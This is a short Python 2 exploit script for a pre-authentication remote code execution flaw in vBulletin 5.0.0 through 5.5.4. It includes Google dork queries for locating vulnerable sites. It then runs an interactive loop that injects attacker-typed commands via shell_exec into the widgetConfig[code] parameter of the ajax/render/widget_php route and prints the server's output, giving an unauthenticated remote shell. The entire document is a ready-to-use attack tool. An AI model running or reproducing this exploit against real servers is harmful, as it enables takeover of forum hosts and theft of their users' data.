#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

banner = r'''

   _______      ________    ___   ___  __  ___        __   ________ _____ ___  
  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \      /_ | / /____  | ____/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | || | (_) |______| |/ /_   / /| |__| (_) |
 | |      \ \/ / |  __|______/ /| | | || |\__, |______| | '_ \ / / |___ \\__, |
 | |____   \  /  | |____    / /_| |_| || |  / /       | | (_) / /   ___) | / / 
  \_____|   \/   |______|  |____|\___/ |_| /_/        |_|\___/_/   |____/ /_/  
                                                                               
                 vBulletin 5.x 0day pre-auth RCE exploit     
        This should work on all versions from 5.0.0 till 5.5.4    
                  site:*.vbulletin.net   
                  "Powered by vBulletin Version 5.5.4"  

                      python edit  by jas502n     
                                                                

'''
print banner

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

proxies ={
     "http":"http://127.0.0.1:8080/"
}
params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input(">>>Shell= ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
          r = requests.post(url = sys.argv[1], data = params, proxies=proxies)
          if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.content:
               print
               print r.content.split('be4ea51d962be8308a0099ae1eb3ec63')[0]
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))